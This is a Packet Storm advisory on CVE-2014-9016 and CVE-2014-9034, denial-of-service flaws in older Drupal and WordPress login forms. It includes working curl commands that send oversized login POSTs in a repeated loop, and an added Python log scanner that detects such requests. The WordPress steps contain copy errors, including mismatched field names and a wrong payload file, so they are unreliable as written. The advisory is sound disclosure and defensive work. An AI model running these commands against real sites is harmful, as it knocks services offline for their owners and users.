
Drupal / WordPress Memory Exhaustion

01 Dec 2014 | Reported by Javer Nieto | Type: packetstorm | Source: packetstormsecurity.com

A vulnerability in WordPress < 4.0.1 and Drupal < 7.34 leads to CPU and memory exhaustion, causing denial of service. The advisory below gives the security update timeline and the proof-of-concept steps.

`====================================================================  
DESCRIPTION:  
====================================================================  
A vulnerability present in Wordpress < 4.0.1 and Drupal < 7.34 allows an  
attacker to send specially crafted requests resulting in CPU and memory  
exhaustion. This may lead to the site becoming unavailable or  
unresponsive (denial of service).  
  
====================================================================  
Time Line:  
====================================================================  
  
November 19, 2014 - A Drupal security update and the security advisory  
is published.  
  
November 20, 2014 - A Wordpress security update and the security  
advisory is published.  
  
====================================================================  
Proof of Concept:  
====================================================================  
  
  
Drupal Denial of Service CVE-2014-9016  
Generate a payload and try with a non-valid user:  
  
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload  
  
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &  
  
Generate a payload and try with a valid user:  
  
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload  
  
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &  
  
Perform a DoS with a valid user:  
  
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done  
  
  
Wordpress Denial of Service CVE-2014-9034  
Generate a payload and try with a non-valid user:  
  
$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload  
  
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &  
  
Generate a payload and try with a valid user:  
  
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload  
  
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &  
  
Perform a DoS with a valid user:  
  
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done  
  
  
====================================================================  
Authors:  
====================================================================  
  
-- Javer Nieto -- http://www.behindthefirewalls.com  
-- Andres Rojas -- http://www.devconsole.info  
  
====================================================================  
References:  
====================================================================  
  
* https://wordpress.org/news/2014/11/wordpress-4-0-1/  
  
* https://www.drupal.org/SA-CORE-2014-006  
  
* http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html  
  
* http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html  
  
* http://www.devconsole.info/?p=1050  
  
`
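
A detection check for the request pattern in the advisory above, added here as an example and not part of the original advisory: it scans web access logs for POSTs to the two login endpoints whose request size is far beyond a normal login form. It assumes an nginx `log_format` that appends `rl=$request_length` to the combined format, an 8192-byte ceiling chosen for illustration, and constructed sample lines.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Assumed log layout: nginx "combined" fields followed by rl=$request_length.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ rl=(?P<rl>\d+)$'
)
MAX_LOGIN_BODY = 8192  # assumed ceiling, in bytes, for a legitimate login POST


def is_login_target(target):
    """True for the login endpoints named in the advisory (wp-login.php, ?q=user)."""
    parts = urlsplit(target)
    if parts.path.endswith("/wp-login.php"):
        return True
    q = parse_qs(parts.query).get("q", [""])[0]
    return q == "user" or q.startswith("user/")


def oversized_login_posts(lines, limit=MAX_LOGIN_BODY):
    """Return (hits, per_ip): (ip, target, length) tuples over the limit, and counts per client."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST" or not is_login_target(m["target"]):
            continue  # unparsable line, not a POST, or not a login endpoint
        length = int(m["rl"])
        if length > limit:
            hits.append((m["ip"], m["target"], length))
            per_ip[m["ip"]] += 1
    return hits, per_ip


# Constructed sample lines (documentation address ranges, invented sizes).
SAMPLE = [
    '198.51.100.4 - - [01/Dec/2014:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 rl=412',
    '203.0.113.7 - - [01/Dec/2014:10:00:02 +0000] "POST /drupal/?q=user HTTP/1.1" 200 7311 rl=5889120',
    '203.0.113.7 - - [01/Dec/2014:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 2954 rl=5889101',
    '203.0.113.7 - - [01/Dec/2014:10:00:03 +0000] "GET /drupal/?q=user HTTP/1.1" 200 7311 rl=180',
    '198.51.100.9 - - [01/Dec/2014:10:00:04 +0000] "POST /drupal/?q=node/add HTTP/1.1" 200 900 rl=20480',
]

if __name__ == "__main__":
    hits, per_ip = oversized_login_posts(SAMPLE)
    for ip, target, length in hits:
        print(f"{ip} {target} request_length={length}")
    print(dict(per_ip))
```

A client that appears repeatedly in `per_ip` within a short window matches the repeated-request loop in the proof of concept; the same size ceiling can also be enforced at the reverse proxy for these endpoints.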
